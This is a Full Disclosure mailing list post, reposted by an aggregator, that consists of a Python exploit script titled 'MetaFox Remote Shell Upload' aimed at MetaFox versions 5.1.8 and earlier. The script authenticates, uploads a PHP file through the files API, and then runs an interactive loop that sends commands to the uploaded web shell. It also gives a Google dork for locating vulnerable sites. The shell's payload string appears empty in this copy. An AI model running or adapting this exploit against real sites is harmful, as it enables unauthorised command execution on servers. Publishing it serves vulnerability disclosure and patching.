MetaFox Remote Shell Upload Exploit
2024-3-14 03:56:39 Author: seclists.org(查看原文) 阅读量:26 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: "[email protected]" <[email protected]>
Date: Wed, 6 Mar 2024 11:20:33 +0100

#!/usr/bin/env python3# Exploit Title: MetaFox Remote Shell Upload# Google Dork: "Social network for niche 
communities"# Exploit Author: The Joker# Vendor Homepage: https://www.phpfox.com# Version: <= 5.1.8import jsonimport 
requestsimport sysif len(sys.argv) != 4:   sys.exit("Usage: %s " % sys.argv[0])   
requests.packages.urllib3.disable_warnings()endpoint = sys.argv[1] + "/api/v1/user/login"response = 
requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)json_response = 
json.loads(response.text)if not "access_token" in json_response:   sys.exit("Login failed!")print("Login success! 
Uploading shell")token = json_response["access_token"]endpoint = sys.argv[1] + "/api/v1/files"files = {"file[0]": 
("wtf.php", "")}response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, 
verify=False)json_response = json.loads(response.text)if not "data" in json_response or not "url" in 
json_response["data"][0]:   sys.exit("Upload failed!")shell_url = json_response["data"][0]["url"]print("Shell uploaded 
at %s\n" % shell_url)while True:   command = input("$ ")   response = requests.post(shell_url, data={"command": 
command}, verify=False)   print(response.text)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:


文章来源: https://seclists.org/fulldisclosure/2024/Mar/30
如有侵权请联系:admin#unsafe.sh